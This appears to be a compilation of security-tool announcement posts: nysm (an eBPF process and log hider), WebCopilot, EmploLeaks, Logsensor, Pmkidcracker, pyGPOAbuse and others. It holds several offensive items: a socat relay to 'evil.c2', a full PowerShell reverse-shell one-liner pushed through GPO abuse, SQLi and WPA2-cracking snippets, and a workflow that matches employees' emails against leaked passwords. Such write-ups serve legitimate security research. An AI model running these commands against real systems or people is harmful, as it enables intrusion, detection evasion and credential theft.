-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

Examples

Run a hidden bash:

./nysm bash

Run a hidden ssh and remove ./nysm:

./nysm -r ssh user@domain

Run a hidden socat as a daemon and remove ./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

How it works

In general

As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a separate PID namespace.

Hide eBPF objects

bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

Hide Auditd logs

Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header with 0.

Hide PIDs

Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires looping through all its files, the eBPF instruction limit is easily reached. Therefore, nysm uses tail calls before reaching it.

Hide sockets

Hiding sockets is a big claim. In fact, opened sockets are already hidden from many tools, as they cannot find the owning process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the length of all these messages combined.

Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

These are collected from the connect() and bind() calls.

Limitations

Even with the best effort, nysm still has some limitations.

  • Every tool that does not close its file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

  • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

  • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

  • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

  • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

By: Zion3R
10 January 2024 at 11:30


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerates all the subdomains of the given target domain using assetfinder, sublist3r, subfinder, amass, findomain, hackertarget, riddler and crt.sh, then does active subdomain enumeration using gobuster with a SecLists wordlist, then filters out all the live subdomains using dnsx, extracts titles of the subdomains using httpx, and scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains, uses gf patterns to filter out xss, lfi, ssrf, sqli, open redirect & rce parameters from those subdomains, and then scans for vulnerabilities on the subdomains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Finally, it prints out the result of the scan and saves all the output in a specified directory.


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Required]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as root to install webcopilot:

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinder, Sublist3r, Findomain, gf, OpenRedireX, dnsx, sqlmap, gobuster, assetfinder, httpx, kxss, qsreplace, Nuclei, dalfox, anew, jq, aquatone, urldedupe, Amass, gauplus, waybackurls, crlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t command can be used to add threads to your scan for faster results.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b command can be used for blind XSS (OOB); you can get your server from xsshunter or interact.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options looks like this:

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
                                ──────▄▀▄─────▄▀▄
─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54
[●] Subdoamin Scanned - [amass✔] Subdomain Found: 43
[●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdomains is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSS✔] Found: 0
[●] Vulnerabilities Scanned - [SQLi✔] Found: 0
[●] Vulnerabilities Scanned - [LFI✔] Found: 0
[●] Vulnerabilities Scanned - [CRLF✔] Found: 0
[●] Vulnerabilities Scanned - [SSRF✔] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0
[●] Vulnerabilities Scanned - [Open redirect✔] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0
[●] Vulnerabilities Scanned - [Nuclei✔] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired by Garud & Pinaak, both by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool, so please use it with caution; you are responsible for your own actions.


Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R
11 January 2024 at 11:30


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code; it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev


EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R
12 January 2024 at 11:30

 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it by running:

cd cli
python3 -m pip install psycopg2-binary

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool 🕵 to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • LinkedIn, for searching all employees from a company and getting their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employee profiles, a search against a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, set the plugin to use, which in this case is linkedin. Then set your authentication tokens and run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successful
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successful
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn browser session. You can use the Web Developer Tools to get them: sign in to LinkedIn normally, right-click the page and choose Inspect, and you will find the cookies in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow that uses the information retrieved from LinkedIn to match employees' personal emails to potentially leaked passwords. In this case, you can connect to a database (in our case a custom indexed COMB database) using the connect command, as shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once connected, you can run the workflow. With all the users gathered, the tool will search the database for leaked credentials affecting any of them:
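
For reference, such a lookup could look like the minimal psycopg2 sketch below; the table and column names (leaks.email, leaks.password) are assumptions for illustration, not EmploLeaks' actual schema:

import psycopg2

def leaked_creds(emails, dsn="dbname=mydbname user=myuser password=mypass123 host=1.2.3.4"):
    # Match gathered personal emails against an indexed COMB-style table
    # (hypothetical schema: leaks(email, password))
    with psycopg2.connect(dsn) as conn, conn.cursor() as cur:
        cur.execute("SELECT email, password FROM leaks WHERE email = ANY(%s)", (emails,))
        return cur.fetchall()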

Finally, the tool will generate console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from their email addresses)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An important aspect of this project is the use of the indexed COMB database. To build your own version, you need to download the torrent first. Be careful: the downloaded files plus the indexed version require at least 400 GB of available disk space.

Once the torrent has been completely downloaded, you will get a folder structure like the following:

├── count_total.sh
├── data
│ ├── 0
│ ├── 1
│ │ ├── 0
│ │ ├── 1
│ │ ├── 2
│ │ ├── 3
│ │ ├── 4
│ │ ├── 5
│ │ ├── 6
│ │ ├── 7
│ │ ├── 8
│ │ ├── 9
│ │ ├── a
│ │ ├── b
│ │ ├── c
│ │ ├── d
│ │ ├── e
│ │ ├── f
│ │ ├── g
│ │ ├── h
│ │ ├── i
│ │ ├── j
│ │ ├── k
│ │ ├── l
│ │ ├── m
│ │ ├── n
│ │ ├── o
│ │ ├── p
│ │ ├── q
│ │ ├── r
│ │ ├── s
│ │ ├── symbols
│ │ ├── t

At this point, you could import all those files with the command create_db:

The importer takes a long time, so we recommend running it with patience.

Next Steps

We are integrating other public sites and applications that may offer information about leaked credentials. We may not be able to see the plaintext password, but they will give insight into whether the user has any compromised credentials:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will focus on gathering even more information about every employee from public sources. Do you have an idea in mind? Don't hesitate to reach out to us:

Or you can DM @pastacls or @gaaabifranco on Twitter.



Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

By: Zion3R
13 January 2024 at 11:30


A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

Features

  • Login panel scanning for multiple hosts
  • Proxy compatibility (http, https)
  • Login panel scanning is done with multiprocessing, so the script is super fast at scanning many URLs

A quick tutorial & screenshots are shown at the bottom, along with project contribution tips.

 

Installation

git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh

Dependencies

 

Quick Tutorial

1. Multiple hosts scanning to detect login panels

  • You can increase the threads (default 30)
  • Or run only the login detector module
python3 logsensor.py -f <subdomains-list> 
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login

2. Targeted SQLi form scanning

  • You can provide a specific login panel URL with the --sqli or -s flag to run only the SQLi form scanning module
  • Turn on the proxy to see the requests
  • Customize the username input name of the login panel if it differs from the default ("username")
python logsensor.py -u www.example.com/login --sqli 
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email
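
For intuition, an error-based POST form SQLi probe boils down to something like the following sketch (illustrative only, not Logsensor's actual logic; the password field name and error strings are assumptions):

import requests

# Common database error fragments that betray an injectable form (non-exhaustive)
SQL_ERRORS = ("you have an error in your sql syntax", "sqlstate", "mysql_fetch", "ora-")

def sqli_probe(url, inputname="username"):
    # Send a classic quote-breaking payload and look for database error strings
    data = {inputname: "admin' OR '1'='1", "password": "x"}
    resp = requests.post(url, data=data, timeout=10)
    return any(err in resp.text.lower() for err in SQL_ERRORS)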

View help

python logsensor.py --help

usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit

Screenshots


Development

TODO

  1. Add "POST form SQLi (time-based) scanning" and check for delays
  2. Fuzz URL paths so as not to miss any login panels


EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R
14 January 2024 at 11:30


Zero-dollar attack surface management tool, featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest-to-set-up tool for giving your organization visibility into its external-facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is an example of this YAML file:

# EasyEASM configurations
runConfig:
  domains: # List root domains here.
    - example.com
    - mydomain.com
  slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
  discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
  runType: fast # Set to either fast (passive enum) or complete (active enumeration).
  activeWordList: subdomainWordlist.txt
  activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.



Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R
15 January 2024 at 11:30


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, and pmkid must be hexstrings, e.g. b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 256-bit output)
  2. PMKID calculation: PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" + AP MAC + client MAC)

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
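
As a sanity check, the two formulas fit in a few lines of standalone Python (a minimal sketch; the tool's own find_pw_chunk and calculate_pmkid are organized differently):

import hashlib
import hmac

def calc_pmkid(passphrase, ssid, ap_mac, client_mac):
    # PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256-bit output)
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # PMKID: first 128 bits of HMAC-SHA1 keyed with the PMK over "PMK Name" + AP MAC + client MAC
    msg = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, msg, hashlib.sha1).hexdigest()[:32]

# calc_pmkid("password123", "MyWifi", "b8621f50edd9", "aabbccddeeff")  # hypothetical values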

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.

Note: you may use Hcxtools or Bettercap to quickly obtain the PMKID without the steps below; the manual way is for understanding.

To obtain the PMKID manually with Wireshark, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture EAPOL message 1 of the handshake. Follow the next three steps to obtain the fields needed for the arguments.

Open the pcap in Wireshark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
  • In the EAPOL 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and client MAC.
  • In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is below it.

If the access point is vulnerable, you should see the PMKID value as in the screenshot below:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



CloudRecon - Finding assets from certificates

By: Zion3R
16 January 2024 at 11:30


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

Note: you must have CGO enabled, and may have to install gcc to run CloudRecon:

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (e.g., cloud providers' IP ranges) and find these hidden gems for testers by inspecting their SSL certificates.
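
For intuition, the core trick (pulling the TLS certificate from a bare IP and reading its names) looks roughly like this in Python (a sketch only; CloudRecon itself is written in Go, and this example uses the third-party cryptography package):

import socket
import ssl

from cryptography import x509
from cryptography.x509.oid import ExtensionOID, NameOID

def cert_names(ip, port=443, timeout=4):
    # Accept any certificate: we want the names even if the cert is untrusted
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock) as tls:
            der = tls.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(der)
    cn = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        sans = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME).value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        sans = []
    return cn, sans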

The tool suite has three parts, all written in Go:

Scrape - a live tool that inspects the given ranges for a keyword in SSL certs' CN and SAN fields in real time.

Store - a tool that retrieves IPs' certs and downloads all their Orgs, CNs, and SANs, so you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in SAN column, returns like-results (default "NONE")


pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R
17 January 2024 at 11:30


Partial Python implementation of SharpGPOAbuse by @pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for a computer GPO, or as the logged-in user for a user GPO.

Default behavior adds a local administrator.


How to use

Basic usage

Add user john to the local administrators group (password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user

Credits



FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion

By: Zion3R
18 January 2024 at 11:30


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

